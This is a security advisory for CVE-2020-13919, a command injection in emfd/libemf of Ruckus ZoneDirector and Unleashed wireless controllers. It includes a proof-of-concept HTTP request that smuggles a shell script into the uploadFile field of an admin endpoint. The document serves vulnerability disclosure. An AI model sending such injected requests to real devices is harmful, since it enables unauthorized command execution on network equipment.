Authenticated command injection in emfd/libemf

Aleph Research Advisory

Identifier

CVE-2020-13919

Severity

High

Product

- ZoneDirector - Unleashed

Vulnerable Version

- ZoneDirector: 9.9 and before - ZoneDirector: 9.10.x - ZoneDirector: 9.12.x - ZoneDirector: 9.13.x - ZoneDirector: 10.0.x - ZoneDirector: 10.1.x - ZoneDirector: 10.2.x - ZoneDirector: 10.3.x - Unleashed: 200.6 and before - Unleashed: 200.7

Technical Details

emfd/libemf in Ruckus Wireless Unleashed through 200.7.10.102.92 allows a remote attacker to achieve command injection via a crafted HTTP request.

Information about the exploitation of this vulnerability can alos be found in our DEFCON 28 talk.

Proof Of Concept

POST /admin/_cmdstat.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded charset=UTF-8
X-CSRF-Token: 1VvEMc1nbx
Cookie: -ejs-session-=x0ea15a04dc0b243874d37739741e4946
Content-Length: 205

<ajax-request action='docmd' xcmd='get-platform-depends' updater='system.1568118269965.3208' comp='system'>
<xcmd cmd='import-avpport' uploadFile='#!/bin/sh\nsleep\t10' type='wlan-maxnums'/>
</ajax-request>

Timeline

05-Feb-20
: Reported to Ruckus Product Security Team
15-Jun-20
: Patch
07-Jun-20
: CVE-2020-13919 assigned
05-Aug-20
: Public disclosure

Credit

waveburst of Aleph Research, HCL Software